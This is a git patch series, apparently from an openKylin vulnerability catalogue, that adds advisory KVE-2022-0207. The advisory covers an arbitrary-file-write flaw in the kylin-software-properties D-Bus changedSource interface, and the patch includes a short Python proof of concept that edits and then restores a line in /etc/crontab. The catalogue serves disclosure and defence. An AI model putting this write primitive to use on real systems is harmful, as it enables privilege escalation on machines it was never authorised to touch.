From 202d953c6c46241404e8544ca95a776eb6003bfe Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Fri, 21 Oct 2022 10:38:05 +0800 Subject: [PATCH 1/2] ADD KVE-2022-0207 --- .../2022/KVE-2022-0207/poc.py | 15 +++++++++++++++ .../2022/yaml/KVE-2022-0207.yaml | 18 ++++++++++++++++++ vulnerability_list.yaml | 1 + 3 files changed, 34 insertions(+) create mode 100644 kve/kylin-software-properties/2022/KVE-2022-0207/poc.py create mode 100644 kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml diff --git a/kve/kylin-software-properties/2022/KVE-2022-0207/poc.py b/kve/kylin-software-properties/2022/KVE-2022-0207/poc.py new file mode 100644 index 00000000..5c4af3fc --- /dev/null +++ b/kve/kylin-software-properties/2022/KVE-2022-0207/poc.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python3 + +import sys +import dbus +import os + +def change_source(old, new, target): + bus = dbus.SystemBus() + obj = bus.get_object("com.kylin.software.properties", "/com/kylin/software/properties") + proxy = dbus.Interface(obj, "com.kylin.software.properties.interface") + print(proxy.changedSource([old, new, target])) + +change_source("#", "kylin666", "/etc/crontab") +os.system("grep -rn 'kylin666' /etc/crontab") +change_source("kylin666", "#", "/etc/crontab") \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml new file mode 100644 index 00000000..8f55578e --- /dev/null +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml @@ -0,0 +1,18 @@ +id: KVE-2022-0207 +source: openKylin Community +info: + name: 源管理服务的changedSource接口任意文件写入漏洞。 + severity: high + description: | + com.kylin.software.properties.interface.changedSource接口存在任意文件写入漏洞。可任意替换文件任意行内容。导致权限提升。 + kylin-software-properties< 0.0.1-127 + reference: + - https://kylinos.cn/support/loophole/patch/1871.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: None + cwe-id: None + cnvd-id: None + kve-id: KVE-2022-0207 + tags: kve2022,dbus \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index 2cdeb4ef..3a166de8 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -24,6 +24,7 @@ cve: cnvd: kve: kylin-software-properties: + - KVE-2022-0207 - KVE-2022-0210 youker-assistant: - KVE-2022-0205 \ No newline at end of file -- Gitee From 0fb8db1970ed2ea9d0516065e4d00de057a97340 Mon Sep 17 00:00:00 2001 From: yangjipeng Date: Fri, 21 Oct 2022 10:41:56 +0800 Subject: [PATCH 2/2] UPDATE KVE-2022-0207 --- kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml index 8f55578e..509a3d1f 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml @@ -5,6 +5,7 @@ info: severity: high description: | com.kylin.software.properties.interface.changedSource接口存在任意文件写入漏洞。可任意替换文件任意行内容。导致权限提升。 + scope-of-influence: kylin-software-properties< 0.0.1-127 reference: - https://kylinos.cn/support/loophole/patch/1871.html -- Gitee